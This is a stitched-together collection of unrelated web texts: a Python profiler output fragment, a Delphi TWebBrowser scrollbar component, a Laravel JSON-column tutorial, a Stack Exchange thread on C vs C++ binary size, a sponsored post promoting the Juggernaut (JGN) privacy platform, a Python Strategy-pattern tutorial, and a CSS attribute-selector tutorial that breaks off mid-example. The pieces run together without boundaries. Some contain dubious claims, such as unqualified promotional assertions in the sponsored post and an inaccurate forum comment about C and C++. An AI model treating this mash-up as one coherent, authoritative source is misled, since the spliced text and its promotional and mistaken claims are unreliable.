1 0.007 0.007 0.067 0.067 test.py:182(insertion_sort)
10000 0.008 0.000 0.060 0.000 test.py:189(insert_value)
10000 0.028 0.000 0.028 0.000 {method 'insert' of 'list' objects}
10000 0.024 0.000 0.024 0.000 {built-in method _bisect.bisect_left}
1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}

Sometimes for more complex issues you can use stats.print_callers()

Use tracemalloc to Understand Memory Usage and Leaks#

More about this in the book…Item 59

Source:

•	"Effective Python: 59 Specific Ways to Write Better Python (Effective
Software Development Series).” - Brett Slatkin
WebBrowserWithUI [scrollbar settings supported]

The WebBrowser control that ships with Delphi has no scrollbar settings. The code below adds support for configuring the scrollbars. If you are on Delphi 7 you can save the code below as a .pas file and install it directly; if you are on Delphi 2010, click here to download the component package I built and install that instead. 8)

After installation you can set the scrollbar properties through the property page shown above. :)

unit WebBrowserWithUI;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  OleCtrls, SHDocVw, ComObj, ActiveX;

type
  TEnhancedWebBrowserUI = class(TPersistent)
  private
    FlatScrollBar: boolean;
    IE3DBorder: boolean;
    RightClickMenu: boolean;
    ScrollBar: boolean;
  public
    constructor Create;
  published
    property EnableScrollBars: boolean read ScrollBar write ScrollBar;
    property EnableFlatScrollBars: boolean read FlatScrollBar write FlatScrollBar;
    property EnableContextMenu: boolean read RightClickMenu write RightClickMenu;
    property Enable3DBorder: boolean read IE3DBorder write IE3DBorder;
  end;

  pDocHostUIInfo = ^TDocHostUIInfo;
  TDocHostUIInfo = packed record
    cbSize: ULONG;
    dwFlags: DWORD;
    dwDoubleClick: DWORD;
    pchHostCss: POLESTR;
    pchHostNS: POLESTR;
  end;

  IDocHostUIHandler = interface(IUnknown)
    ['{bd3f23c0-d43e-11cf-893b-00aa00bdce1a}']
    function ShowContextMenu(const dwID: DWORD; const ppt: PPOINT;
      const pcmdtReserved: IUnknown; const pdispReserved: IDispatch): HRESULT; stdcall;
    function GetHostInfo(var pInfo: TDOCHOSTUIINFO): HRESULT; stdcall;
    function ShowUI(const dwID: DWORD; const pActiveObject: IOleInPlaceActiveObject;
      const pCommandTarget: IOleCommandTarget; const pFrame: IOleInPlaceFrame;
      const pDoc: IOleInPlaceUIWindow): HRESULT; stdcall;
    function HideUI: HRESULT; stdcall;
    function UpdateUI: HRESULT; stdcall;
    function EnableModeless(const fEnable: BOOL): HRESULT; stdcall;
    function OnDocWindowActivate(const fActivate: BOOL): HRESULT; stdcall;
    function OnFrameWindowActivate(const fActivate: BOOL): HRESULT; stdcall;
    function ResizeBorder(const prcBorder: PRECT;
      const pUIWindow: IOleInPlaceUIWindow; const fRameWindow: BOOL): HRESULT; stdcall;
    function TranslateAccelerator(const lpMsg: PMSG; const pguidCmdGroup: PGUID;
      const nCmdID: DWORD): HRESULT; stdcall;
    function GetOptionKeyPath(var pchKey: POLESTR; const dw: DWORD): HRESULT; stdcall;
    function GetDropTarget(const pDropTarget: IDropTarget;
      out ppDropTarget: IDropTarget): HRESULT; stdcall;
    function GetExternal(out ppDispatch: IDispatch): HRESULT; stdcall;
    function TranslateUrl(const dwTranslate: DWORD; const pchURLIn: POLESTR;
      var ppchURLOut: POLESTR): HRESULT; stdcall;
    function FilterDataObject(const pDO: IDataObject;
      out ppDORet: IDataObject): HRESULT; stdcall;
  end;

  TWebBrowserWithUI = class(TWebBrowser, IDocHostUIHandler)
  private
    { Private declarations }
    UIProperties: TEnhancedWebBrowserUI;
  protected
    { Protected declarations }
  public
    { Public declarations }
    constructor Create(AOwner: TComponent); override;
    destructor Destroy; override;
    function ShowContextMenu(const dwID: DWORD; const ppt: PPOINT;
      const pcmdtReserved: IUnknown; const pdispReserved: IDispatch): HRESULT; stdcall;
    function GetHostInfo(var pInfo: TDOCHOSTUIINFO): HRESULT; stdcall;
    function ShowUI(const dwID: DWORD; const pActiveObject: IOleInPlaceActiveObject;
      const pCommandTarget: IOleCommandTarget; const pFrame: IOleInPlaceFrame;
      const pDoc: IOleInPlaceUIWindow): HRESULT; stdcall;
    function HideUI: HRESULT; stdcall;
    function UpdateUI: HRESULT; stdcall;
    function EnableModeless(const fEnable: BOOL): HRESULT; stdcall;
    function OnDocWindowActivate(const fActivate: BOOL): HRESULT; stdcall;
    function OnFrameWindowActivate(const fActivate: BOOL): HRESULT; stdcall;
    function ResizeBorder(const prcBorder: PRECT;
      const pUIWindow: IOleInPlaceUIWindow; const fRameWindow: BOOL): HRESULT; stdcall;
    function TranslateAccelerator(const lpMsg: PMSG; const pguidCmdGroup: PGUID;
      const nCmdID: DWORD): HRESULT; stdcall;
    function GetOptionKeyPath(var pchKey: POLESTR; const dw: DWORD): HRESULT; stdcall;
    function GetDropTarget(const pDropTarget: IDropTarget;
      out ppDropTarget: IDropTarget): HRESULT; stdcall;
    function GetExternal(out ppDispatch: IDispatch): HRESULT; stdcall;
    function TranslateUrl(const dwTranslate: DWORD; const pchURLIn: POLESTR;
      var ppchURLOut: POLESTR): HRESULT; stdcall;
    function FilterDataObject(const pDO: IDataObject;
      out ppDORet: IDataObject): HRESULT; stdcall;
  published
    { Published declarations }
    property UISettings: TEnhancedWebBrowserUI read UIProperties write UIProperties;
  end;

const
  DOCHOSTUIFLAG_DIALOG                    = $00000001;
  DOCHOSTUIFLAG_DISABLE_HELP_MENU         = $00000002;
  DOCHOSTUIFLAG_NO3DBORDER                = $00000004;
  DOCHOSTUIFLAG_SCROLL_NO                 = $00000008;
  DOCHOSTUIFLAG_DISABLE_SCRIPT_INACTIVE   = $00000010;
  DOCHOSTUIFLAG_OPENNEWWIN                = $00000020;
  DOCHOSTUIFLAG_DISABLE_OFFSCREEN         = $00000040;
  DOCHOSTUIFLAG_FLAT_SCROLLBAR            = $00000080;
  DOCHOSTUIFLAG_DIV_BLOCKDEFAULT          = $00000100;
  DOCHOSTUIFLAG_ACTIVATE_CLIENTHIT_ONLY   = $00000200;
  DOCHOSTUIFLAG_OVERRIDEBEHAVIOURFACTORY  = $00000400;
  DOCHOSTUIFLAG_CODEPAGELINKEDFONTS       = $00000800;
  DOCHOSTUIFLAG_URL_ENCODING_DISABLE_UTF8 = $00001000;
  DOCHOSTUIFLAG_URL_ENCODING_ENABLE_UTF8  = $00002000;
  DOCHOSTUIFLAG_ENABLE_FORMS_AUTOCOMPLETE = $00004000;

  IID_IDocHostUIHandler: TGUID = '{bd3f23c0-d43e-11CF-893b-00aa00bdce1a}';

procedure Register;

implementation

procedure Register;
begin
  RegisterComponents('Samples', [TWebBrowserWithUI]);
end;

{ TEnhancedWebBrowserUI }

constructor TEnhancedWebBrowserUI.Create;
begin
  { Default UI settings: normal scrollbars, 3D border and context menu on. }
  ScrollBar := True;
  FlatScrollBar := False;
  IE3DBorder := True;
  RightClickMenu := True;
end;

{ TWebBrowserWithUI }

constructor TWebBrowserWithUI.Create(AOwner: TComponent);
begin
  inherited;
  UIProperties := TEnhancedWebBrowserUI.Create;
end;

destructor TWebBrowserWithUI.Destroy;
begin
  UIProperties.Free;
  inherited;
end;

function TWebBrowserWithUI.EnableModeless(const fEnable: BOOL): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.FilterDataObject(const pDO: IDataObject;
  out ppDORet: IDataObject): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.GetDropTarget(const pDropTarget: IDropTarget;
  out ppDropTarget: IDropTarget): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.GetExternal(out ppDispatch: IDispatch): HRESULT;
begin
  Result := S_OK;
end;

function TWebBrowserWithUI.GetHostInfo(var pInfo: TDOCHOSTUIINFO): HRESULT;
begin
  { Translate the published UI settings into DOCHOSTUIFLAG_* bits. }
  pInfo.cbSize := SizeOf(pInfo);
  pInfo.dwFlags := 0;
  if not UIProperties.EnableScrollBars then
    pInfo.dwFlags := pInfo.dwFlags or DOCHOSTUIFLAG_SCROLL_NO;
  if UIProperties.EnableFlatScrollBars then
    pInfo.dwFlags := pInfo.dwFlags or DOCHOSTUIFLAG_FLAT_SCROLLBAR;
  if not UIProperties.Enable3DBorder then
    pInfo.dwFlags := pInfo.dwFlags or DOCHOSTUIFLAG_NO3DBORDER;
  Result := S_OK;
end;

function TWebBrowserWithUI.GetOptionKeyPath(var pchKey: POLESTR;
  const dw: DWORD): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.HideUI: HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.OnDocWindowActivate(const fActivate: BOOL): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.OnFrameWindowActivate(const fActivate: BOOL): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.ResizeBorder(const prcBorder: PRECT;
  const pUIWindow: IOleInPlaceUIWindow; const fRameWindow: BOOL): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.ShowContextMenu(const dwID: DWORD; const ppt: PPOINT;
  const pcmdtReserved: IUnknown; const pdispReserved: IDispatch): HRESULT;
begin
  { S_FALSE lets the default context menu appear; S_OK suppresses it. }
  if UIProperties.EnableContextMenu then
    Result := S_FALSE
  else
    Result := S_OK;
end;

function TWebBrowserWithUI.ShowUI(const dwID: DWORD;
  const pActiveObject: IOleInPlaceActiveObject;
  const pCommandTarget: IOleCommandTarget; const pFrame: IOleInPlaceFrame;
  const pDoc: IOleInPlaceUIWindow): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.TranslateAccelerator(const lpMsg: PMSG;
  const pguidCmdGroup: PGUID; const nCmdID: DWORD): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.TranslateUrl(const dwTranslate: DWORD;
  const pchURLIn: POLESTR; var ppchURLOut: POLESTR): HRESULT;
begin
  Result := S_FALSE;
end;

function TWebBrowserWithUI.UpdateUI: HRESULT;
begin
  Result := S_FALSE;
end;

end.
Original article; please credit when reposting. Source: obaby@mars. Title: "WebBrowserWithUI [scrollbar settings supported]". Permalink: http://h4ck.org.cn/2011/03/webbrowserwithui/
Laravel 10 Store JSON in Database Example

By Hardik Savani
July 26, 2023
Category : Laravel

Hello Guys,

This article shows how to store JSON in the database with Laravel 10.

JSON (JavaScript Object Notation) is a lightweight, text-based format for data exchange that is easy for humans to read and write and easy for machines to parse and generate. JSON is a popular data format used in web applications, APIs, and data exchange between systems. JSON data is represented as key-value pairs and uses a syntax similar to JavaScript object literals. Each key-value pair is separated by a comma, and objects are enclosed in curly braces {}. Keys are always strings, while values can be strings, numbers, boolean values, arrays, or nested JSON objects.

Sometimes we have large or unstructured data, or a set of columns that is not fixed. Rather than creating many nullable fields in a database table, we can use the JSON data type to store the values.

If you want to store a JSON array in a database with Laravel, this is a simple example of how to store it and access it again. We will start by creating a migration with a JSON column. Then we will create a model with getter and setter methods. When creating records, we can pass the data as an array, and when retrieving records, we will receive an array back. So, let's take a look at a simple example to learn how to implement this.
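Before the Laravel-specific steps, it may help to see the encode/decode round trip that a JSON column relies on. This is a neutral illustration in Python (the tutorial itself is PHP); the values mirror the demo record used later:

```python
import json

# The "data" value we will store in the items table, as an array/dict.
data = {"1": "One", "2": "Two", "3": "Three"}

# On write, the array is encoded to a JSON string; this string is what
# actually lands in the table's JSON column.
stored = json.dumps(data)

# On read, the string is decoded back into an array, which is exactly
# what the model's getter/setter pair automates on every access.
loaded = json.loads(stored)

print(stored)           # {"1": "One", "2": "Two", "3": "Three"}
print(loaded == data)   # True
```

The model accessor shown in the steps below performs the same json_encode/json_decode pair in PHP, so application code only ever sees arrays.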
Step 1: Install Laravel

This is optional; if you have not yet created the Laravel app, go ahead and execute the command below:

composer create-project laravel/laravel example-app

Step 2: Create Migration

Here we need to create a database migration for the "items" table with a title column and a data (JSON) column; after that we will create a model for the items table.

php artisan make:migration create_items_table

database/migrations/2022_07_11_141714_create_items_table.php

<?php

use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
use Illuminate\Support\Facades\Schema;

return new class extends Migration
{
    /**
     * Run the migrations.
     *
     * @return void
     */
    public function up(): void
    {
        Schema::create('items', function (Blueprint $table) {
            $table->id();
            $table->string('title');
            $table->json('data')->nullable();
            $table->timestamps();
        });
    }

    /**
     * Reverse the migrations.
     *
     * @return void
     */
    public function down(): void
    {
        Schema::dropIfExists('items');
    }
};

Then run the migrate command to create the items table:

php artisan migrate

Step 3: Create Model

In this step, we will create the Item.php model with a getter and setter. Let's create the model and update it with the following code:

php artisan make:model Item

App/Models/Item.php

<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Casts\Attribute;

class Item extends Model
{
    use HasFactory;

    protected $fillable = [
        'title', 'data'
    ];

    /**
     * Decode the data attribute on read and encode it on write.
     *
     * @return \Illuminate\Database\Eloquent\Casts\Attribute
     */
    protected function data(): Attribute
    {
        return Attribute::make(
            get: fn ($value) => json_decode($value, true),
            set: fn ($value) => json_encode($value),
        );
    }
}

Step 4: Create Route

In this step, we will create one route for testing:
routes/web.php

<?php

use Illuminate\Support\Facades\Route;
use App\Http\Controllers\ItemController;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::get('item', [ItemController::class, 'index']);

Step 5: Create Controller

In this step, we will create the ItemController file and write an index() method that creates an item record from an array and reads the JSON column back as an array.

app/Http/Controllers/ItemController.php

<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;
use App\Models\Item;

class ItemController extends Controller
{
    /**
     * Create an item with an array payload and dump the decoded JSON column.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {
        $input = [
            'title' => 'Demo Title',
            'data' => [
                '1' => 'One',
                '2' => 'Two',
                '3' => 'Three'
            ]
        ];

        $item = Item::create($input);

        dd($item->data);
    }
}

Run Laravel App:

All the required steps are done; now run the Laravel app with:

php artisan serve

Now go to your web browser, open the URL below and view the app output:

http://localhost:8000/item

You can see the database output and the printed variable output.

Database Output: [screenshot in the original post]

Output:

array:3 [
  1 => "One"
  2 => "Two"
  3 => "Three"
]

I hope it can help you...
Programmers Stack Exchange is a question and answer site for professional programmers interested in conceptual questions about software development.

I'm trying to understand why the output file sizes are significantly different when using a C and a C++ compiler. I was writing a small hello world program in C and C++, and I noticed that the C version's executable was 93.7 KB, while the C++ version of the same hello world program was 1.33 MB. I am not sure why that is. I thought it might be because C++ has more libraries and namespaces to use, so I removed the using namespace std line and simply used std::cout, but the result was the same.

C

#include <stdio.h>

int main() {
    printf("hello world");
    return 0;
}
// size 93.7KB

C++

#include <iostream>

int main() {
    std::cout << "Hello world";
    return 0;
}
// size 1.33MB

There doesn't seem to be much difference in the code above. Is there some sort of compiler difference that creates the differing file sizes?

Comments:

- Sort of explains why C is used a lot on embedded devices. – Robert Harvey Jun 26 '14 at 16:07
- Also, it would be a fairer test if you were to write the same exact code in both languages. Even then, I'm not sure that would rid you of the difference, since C++ is much more complicated to compile (and thus would be done differently). – Panzercrisis Jun 26 '14 at 16:07
- As far as I can tell, this has been asked and answered at SO: Why is a C/C++ "Hello World" in the kilobytes? @RobertHarvey FWIW, the Java ME CLDC 1.0 footprint is, per my recollection, 128K, not too much even for late-'90s embedded devices. – gnat Jun 26 '14 at 16:12
- @Hawk The fact that C++ has classes and all the other stuff associated with them is a large part of the reason that C is lower level and closer to the hardware. Still, you can usually do the same things in C++ as you can in C. Since C is basically a subset of C++ (without a lot of the features in C++), it takes longer to write big, huge programs, but they will run somewhat faster. As for interacting with other languages... do you mean like writing assembly language into the C++ code? Yeah, C++ supports that, but I'm not sure if C does or not. – Panzercrisis Jun 26 '14 at 16:14
- There is no question here. Furthermore, even if there was, that question would be unanswerable without specific knowledge about the compiler and compilation flags used. The only way to get a precise answer to the question of why a C++ executable would be so much bigger, and what exactly takes up the bytes, would be to use some kind of binary analysis tool (e.g. readelf on Unix systems, part of GNU binutils) or a hex editor to investigate the file sections and contents. As for the languages themselves, there's absolutely no reason for a difference like that: the C++ output could be just as small as the C output. – zxcdw Jun 26 '14 at 18:30

4 Answers

Answer (accepted, 14 votes):

Most of the C++ standard library, including all of the streams that cout is part of, consists of inline template classes. Whenever you #include one of these inline library components, the compiler will copy and paste all that code into the source file that includes it. This will help the code run faster, but will also add a lot of bytes to the final executable. This is likely the reason for the results you got.
Doing a similar test with the clang compiler on OS X (Apple LLVM version 5.1), using default flags, I got comparable results:

hello_cpp_cout:

#include <iostream>

int main() {
    std::cout << "Hello world" << std::endl;
    return 0;
}

Size: 14,924 bytes

hello_c:

#include <stdio.h>

int main() {
    printf("hello world\n");
    return 0;
}

Size: 8,456 bytes

And, as a bonus, I tried to compile a .cpp file with the exact same code as hello_c, i.e. using printf instead of cout:

hello_cpp_printf:

#include <stdio.h>

int main() {
    printf("hello world\n");
    return 0;
}

Size: 8,464 bytes

As you can see, the executable size is hardly related to the language, but rather to the libraries you include in your project.

Update: As noted in several comments and other replies, the choice of compiler flags will also influence the size of the compiled executable. A program compiled with debug flags will be a lot larger than one compiled with release flags, for example.

Comments:

- Doesn't really explain a 1.33MB file size, though. – Robert Harvey Jun 26 '14 at 21:06
- He must be using Visual Studio :P – glampert Jun 27 '14 at 1:17
- Thanks, dude. I'm using Dev-C++ and it did work. You're right, the libraries really do take up that much space. – Hawk Jul 2 '14 at 7:59

Answer:

"There doesn't seem to be much difference in the code above." Yes there is; it's totally different code. The C++ iostream library relies heavily on templates, which generates more inline code, and so the C++ executable is bigger. Another reason is that you did not strip the debug symbols from the executable files, and for C++ the symbols are quite verbose. If you are on Linux, you can use the "strip" command to remove those symbols and the executable size will shrink.

Answer:

The difference in executable sizes will be heavily dependent on what type of linkage is specified, the optimisations, and the compiler(s) being used.
Given the significant difference in final sizes, it looks like the C++ variant is being statically linked with the runtime. Remove or change that and you should see a drop in the C++ size; for gcc (g++) look for --static* et al., and for MSVC look at the /MD and /MT flags.

Answer:

There is actually quite a lot of difference. The C code uses unformatted, unlocalized output. The C++ equivalent has quite a lot of gunk in it for changing locales and that kind of thing. Functionally, they are far from equivalent; you just happen to be using only a tiny subset of the C++ interface. More generally, though, the larger code sizes are a defect of this particular portion of the Standard library, which is well known to be over-engineered, slow, and large, rather than of the C++ language in general.
Posted by Sponsored Post
Posted on 4 September 2023

Safeguarding Personal Information in the Digital Era: Juggernaut (JGN) and Privacy

In today's digital age, the protection of personal information has become a paramount concern. With the increasing prevalence of cyber threats and the collection of vast amounts of data by various entities, individuals need to be proactive in safeguarding their personal information. This article explores the importance of privacy in the digital era and how Juggernaut (JGN), a cutting-edge technology, can play a pivotal role in this regard.

The Significance of Privacy

Understanding the Digital Landscape

The rapid advancement of technology has transformed the way we live, work, and communicate. The internet has opened up a world of opportunities, enabling us to access information, connect with others, and conduct financial transactions with ease. However, this convenience comes at a cost: our personal information is increasingly vulnerable to unauthorized access, identity theft, and misuse.

The Value of Personal Information

Our personal information, such as our names, addresses, financial details, and online activities, holds immense value. It can be used for targeted advertising, market research, or even more malicious purposes. Cybercriminals and data brokers are constantly looking for opportunities to exploit this information for their own gain. Therefore, it is crucial to take proactive measures to safeguard our personal data.

The Role of Juggernaut (JGN) in Privacy Protection

Introducing Juggernaut (JGN)

Juggernaut (JGN) is a revolutionary technology that leverages blockchain and encryption to create a decentralized platform for secure and private communication. It aims to empower individuals with full control over their personal data, ensuring their privacy is preserved in the digital realm.
Secure Communication

Juggernaut provides end-to-end encryption for all communication conducted on its platform. This means that messages, calls, and other forms of communication remain encrypted throughout the entire transmission process. Even if intercepted, the data is virtually impossible to decipher without the encryption keys. By utilizing Juggernaut, individuals can communicate securely and confidently, knowing that their conversations are protected from prying eyes.

Decentralized Storage

Traditional centralized platforms often store user data in vulnerable servers, making it an attractive target for hackers. Juggernaut takes a different approach by employing decentralized storage systems. Instead of relying on a single server, user data is distributed across multiple nodes, ensuring that even if one node is compromised, the entire system remains secure. This decentralized architecture makes it significantly harder for attackers to breach the system and gain unauthorized access to personal information.

User-Controlled Data Sharing

Juggernaut puts the power of data sharing back into the hands of individuals. Users have the ability to choose which data they want to share and with whom. This user-controlled approach ensures that personal information is not indiscriminately collected and shared without consent. By giving individuals control over their data, Juggernaut strengthens privacy rights and promotes a more transparent and ethical digital environment.

Best Practices for Personal Information Protection

While Juggernaut provides robust privacy protection, it is essential for individuals to adopt best practices to safeguard their personal information effectively. Here are some key tips:

• Strong and Unique Passwords

Create strong, unique passwords for each online account to prevent unauthorized access. Consider using a reliable password manager to securely store and generate passwords.
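The password advice above is easy to automate. As a small illustration (not part of the Juggernaut platform, and Python here purely for demonstration), the standard library's secrets module can generate a strong random password:

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Build a random password from letters, digits and punctuation
    using the cryptographically secure `secrets` generator."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

# A fresh, unique password per account:
print(generate_password())
print(generate_password(24))
```

A password manager does the same job and also remembers the result, which is why the tip recommends one.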
• Enable Two-Factor Authentication (2FA)

Enable 2FA whenever possible to add an extra layer of security to your accounts. This typically involves providing a second form of verification, such as a fingerprint or a unique code sent to your mobile device.

• Regularly Update Software and Devices

Keep your software, apps, and devices up to date with the latest security patches. Software updates often include important security fixes that protect against known vulnerabilities.

• Be Cautious with Personal Information Sharing

Exercise caution when sharing personal information online. Avoid providing unnecessary details on social media platforms and be wary of unsolicited requests for personal information.

• Utilize Encryption Tools

Take advantage of encryption tools to secure your sensitive data. Encrypting files and emails adds an extra layer of protection, making it harder for unauthorized individuals to access your information.

• Regularly Monitor Financial Statements

Regularly review your bank and credit card statements for any suspicious activity. Report any unauthorized transactions or discrepancies immediately to your financial institution.

• Educate Yourself on Privacy Policies

Stay informed about the privacy policies of websites and online services you use. Understand how your personal information is collected, stored, and shared to make informed decisions about the platforms you engage with.

Conclusion

In an increasingly digitized world, safeguarding personal information is of utmost importance. Juggernaut (JGN) provides individuals with the tools and technologies necessary to protect their privacy in the digital era. By utilizing Juggernaut's secure communication, decentralized storage, and user-controlled data sharing, individuals can take control of their personal information and minimize the risks associated with unauthorized access and misuse. Adopting best practices for personal information protection further strengthens the security of personal data.
Remember, in the digital era, safeguarding personal information is not just an option—it's a necessity.
Many developers find themselves solving similar (if not practically identical) problems in the course of their work and arriving at similar solutions. That is how "patterns" came about: templates of the best solutions to certain problems, which produce maximally flexible designs and make code reuse possible. For me, "patterns" had until now remained a slightly scary word, but the desire to get acquainted with them won out over the fear of failing to understand something, and I decided to give it a try. For each topic I work through, I will write small notes with an implementation of the pattern in question in my favorite language, Python.

Having some experience already, and most likely arriving unconsciously at solutions that are described somewhere as ready-made, I began studying design patterns from Eric Freeman and Elisabeth Freeman's book "Head First Design Patterns". The book itself can be bought here.

So, some design principles mentioned by the authors in the first chapter:

1. Identify the aspects of the application that vary and separate them from those that stay the same. "Separate what changes from what stays the same."
2. Program to an interface, not an implementation.
3. Favor composition over inheritance.

It should be noted that the concepts of encapsulation, polymorphism, inheritance and composition are already fairly clear to me at this point. In my own words, encapsulation is the separation of something secondary from the main content into its own place, a "capsule". In programming, encapsulation often means identifying certain entities within a monolithic block of a program and extracting them, in order to improve the structure and sometimes to hide the entity's internal implementation (often to hide private data and prevent it from being changed directly from the outside).

The STRATEGY pattern

The **Strategy** pattern defines a family of algorithms, encapsulates each of them, and makes them interchangeable. It lets the algorithms vary independently of the clients that use them.
Incidentally, as I understand it, any behavior of an entity can be viewed as an algorithm, since a behavior is essentially an algorithm.

As an example the authors describe a model of a duck pond; they show how plain inheritance fails to produce an easily changeable model. In the end the solution looks like this:

strategy_duck.png

The ducks' behavior is extracted (encapsulated) and represented by two separate interfaces, FlyBehavior and QuackBehavior. The entities FlyWithWings and FlyNoWay implement the actual flying behaviors: "the duck flies with its wings", "the duck does not fly". The entities Quack, Squeak and MuteQuack implement the QuackBehavior interface and thus implement concrete qualities: "quacks", "squeaks", "makes no sound". These entities are treated as algorithms, since they really do define different behaviors.

Two objects are "mounted" into the abstract Duck class (composition), represented by variables of the interface types FlyBehavior and QuackBehavior: flyBehavior and quackBehavior respectively. So the client (Duck) uses the encapsulated algorithms (entities). In addition, Duck contains a set of methods that allow manipulating (changing) the behaviors and calling the behaviors' concrete methods. Real "ducks" such as MallardDuck and RubberDuck can then be derived from the abstract Duck class; they may override, say, the display method (what the duck looks like), and real duck instances can be created from them.

The whole point of the example is that you identify a behavior (an algorithm), extract it into a separate entity, and then embed (compose) that encapsulated entity back into the code it was extracted from. As we can see, the rule "program to an interface" is also observed: interfaces, not concrete classes, are embedded into Duck. This brings flexibility: for instance, we can easily add a new behavior algorithm and use it without changing the code of a concrete duck; we can simply set the new behavior.
Here is another example. Suppose we have characters that are able to carry weapons. A weapon has its own properties: a name and a hit strength. Let the characters be able to take and use any weapon. For the example there will be two characters, a Knight and a Thief. We separate (encapsulate) the weapon behavior and, applying composition, embed the weapon into the object representing a character. The class diagram looks like this:

strategy_characters.png

To implement an interface in Python I use an abstract class with an abstract method; this way the client cannot create an instance and is forced to override the abstract method. The second approach I found is based entirely on convention: an ordinary class is declared whose methods return NotImplemented, so client code must subclass it and override those methods. Unfortunately Python has no special construct like Java's interface, but fortunately there are ways to implement abstractions.

So, the interface and the Knife and Sword weapon classes look like this:

from abc import ABCMeta, abstractmethod


class IWeaponBehaviour(metaclass=ABCMeta):
    @abstractmethod
    def use_weapon(self):
        raise NotImplementedError()


# 2nd approach
#class IWeaponBehaviour:
#    def use_weapon(self):
#        raise NotImplementedError()


class KnifeBehaviour(IWeaponBehaviour):
    def use_weapon(self):
        print("Knife hit...")
        print("Damage 2 ...")


class SwordBehaviour(IWeaponBehaviour):
    def use_weapon(self):
        print("Sword hit...")
        print("Damage 5 ...")

The classes implement the interface method use_weapon(), unique to each weapon type.
The abstract character class and the concrete character classes look like this:

class AbstractCharacter(metaclass=ABCMeta):
    @property
    @abstractmethod
    def weapon(self):  # IWeaponBehaviour object
        raise NotImplementedError()

    def set_weapon(self, wb):
        self.weapon = wb

    @abstractmethod
    def fight(self):
        raise NotImplementedError()

    def use_weapon(self):
        self.weapon.use_weapon()


class Thief(AbstractCharacter):
    weapon = KnifeBehaviour()

    def fight(self):
        print("Thief do 1 step")
        self.use_weapon()


class Knight(AbstractCharacter):
    weapon = SwordBehaviour()

    def fight(self):
        print("Knife do 2 steps")
        self.use_weapon()

A concrete character class uses a concrete weapon behavior. The abstract class AbstractCharacter has a set_weapon() method that allows changing a character's weapon on the fly, and a use_weapon() method for using the weapon. The weapon behavior is used as a property; composition is applied here: we use the encapsulated Weapon object inside the Character object.

The full code looks like this:

# -*- coding: utf-8 -*-
"""
Created on Thu Jul 27 09:36:35 2017

@author: biceps
"""

from abc import ABCMeta, abstractmethod


class IWeaponBehaviour(metaclass=ABCMeta):
    @abstractmethod
    def use_weapon(self):
        raise NotImplementedError()


# 2nd approach
#class IWeaponBehaviour:
#    def use_weapon(self):
#        raise NotImplementedError()


class KnifeBehaviour(IWeaponBehaviour):
    def use_weapon(self):
        print("Knife hit...")
        print("Damage 2 ...")


class SwordBehaviour(IWeaponBehaviour):
    def use_weapon(self):
        print("Sword hit...")
        print("Damage 5 ...")


class AbstractCharacter(metaclass=ABCMeta):
    @property
    @abstractmethod
    def weapon(self):  # IWeaponBehaviour object
        raise NotImplementedError()

    def set_weapon(self, wb):
        self.weapon = wb

    @abstractmethod
    def fight(self):
        raise NotImplementedError()

    def use_weapon(self):
        self.weapon.use_weapon()


class Thief(AbstractCharacter):
    weapon = KnifeBehaviour()

    def fight(self):
        print("Thief do 1 step")
        self.use_weapon()


class Knight(AbstractCharacter):
    weapon = SwordBehaviour()

    def fight(self):
        print("Knife do 2 steps")
        self.use_weapon()


thief = Thief()
thief.fight()
thief.set_weapon(SwordBehaviour())
thief.fight()

knight = Knight()
knight.fight()
What are CSS Attribute Selectors? How to use CSS attribute selectors?

CSS attribute selectors are written with square brackets [], similar to the array syntax used in JavaScript. Any attribute name can be placed inside the brackets, for example [id], [class], [style] or [title]. Since almost every HTML element carries common attributes such as id, class, title and style, attribute selectors let us style elements based on those attributes.

CSS provides the following attribute selector types: the [attribute] selector, [attribute="value"], [attribute|="value"], [attribute~="value"], [attribute$="value"], [attribute^="value"] and [attribute*="value"].

An attribute selector can also match against a value, optionally using one of the symbols (|, ~, $, ^, *), for example: div[title="Mr"], div[class="myClassName"]. The examples below show how each form behaves.

A first example: the selector [title~=Mr] applies the background colour only to elements whose title attribute contains the word "Mr":

<style>
[title~=Mr] {
  background: #0bf;
}
</style>
<div title="I am Mr sheo">attribute test</div>
<br>
<div title="sheo Mr">attribute test</div>

CSS [attribute] Example: this example applies the background colour to any div that has an id attribute, and to any element with a class attribute inside a div:

<style>
div[id] {
  background: #0bf;
}
div [class] {
  background: #0bf;
}
</style>
<div id="sheo">attribute test</div>
<br>
<div id="idname">attribute test</div>
<div>
  <p class="test">Paragraph id test</p>
</div>

CSS [attribute|="value"] Example: with the | (pipe) symbol the selector matches a class that is exactly "test" or that starts with "test" followed by a hyphen (-). Classes that merely end with "test", or that join "test" to other text directly or with an underscore (_), are not matched,
as shown in the example below:

<style>
[class|=test] {
  background: #0bf;
}
</style>
<p class="test-text">Anything text</p>
<div class="test-section">attribute test</div>
<p class="testworld">text here any thing</p>
<p class="worldtest">text here any thing</p>
<p class="test_section">text here any thing</p>

CSS [attribute$="value"] Example: with the $ sign the selector matches attribute values that end with the given value. Values that start with it, or contain it only in the middle, are not affected. The example below should make this clearer:

<style>
[class$=test] {
  background: #0bf;
}
